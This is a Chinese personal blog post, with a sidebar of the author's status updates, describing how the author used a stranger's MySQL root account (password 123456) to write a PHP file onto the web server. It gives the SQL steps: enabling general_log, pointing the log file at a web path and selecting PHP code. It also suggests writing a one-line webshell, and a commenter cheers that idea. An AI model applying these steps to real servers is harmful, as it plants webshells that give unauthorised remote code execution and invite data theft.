• 2022-09-04被罚款200元记6分.
  • 特么的.电脑风扇坏了.快递还全部停发.太难了...求求了.疫情赶紧走吧.
  • 难啊难!要钱难!
  • 更新到WordPress5.6啦
  • 有点伤心了,今年净遇到王某海这种人.
  • 难啊难...
  • 七牛的JS SDK 的文档真坑啊.
  • 蓝奏云分享部分地区无法访问需手动修改www.lanzous.com变为:www.lanzoux.com
  • 好气啊~原来使用的CDN服务商莫名其妙的给我服务取消了~
  • 遇见一个沙雕汽车人.

利用MySQL注入写出PHP(ASP)文件

PHP KIENG 5年前 (2019-03-23) 147216次浏览 已收录 1个吐槽 扫描二维码

利用 MySQL 注入写出 PHP(ASP)文件

今天偶尔得到一个 mysql 的 root 权限...(这个人密码就是 123456 我也是醉了)
然后我想看看他有什么文件,咋办呢?

#开启日志
set global general_log = on;

#设置日志保存地址(比如:/wwwroot/xxx/test.php)
set global general_log_file = '绝对路径';

#如果不知道绝对路径可以用这个命令看一下 
show variables like "%char%";

#写出文件
select '<?php echo 1; ?>';

然后你访问那个你设置的保存路径就能看见啦.

比如说file_put_content()之类的 或者 一句话木马啥的都可以


KIENG.CN , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA 4.0协议进行授权
转载请注明出处:利用 MySQL 注入写出 PHP(ASP)文件
本文章链接:https://blog.kieng.cn/648.html
喜欢 (6)
KIENG
关于作者:
一个热衷网络的Man
发表我的评论
取消评论
表情 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 快速获取昵称
  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
(1)个小伙伴在吐槽
  1. 一句话木马牛逼啊
    老哥 | 中国辽宁鞍山市 联通2019-03-23 13:33 回复 Windows 10 | Chrome 69.0.3497.100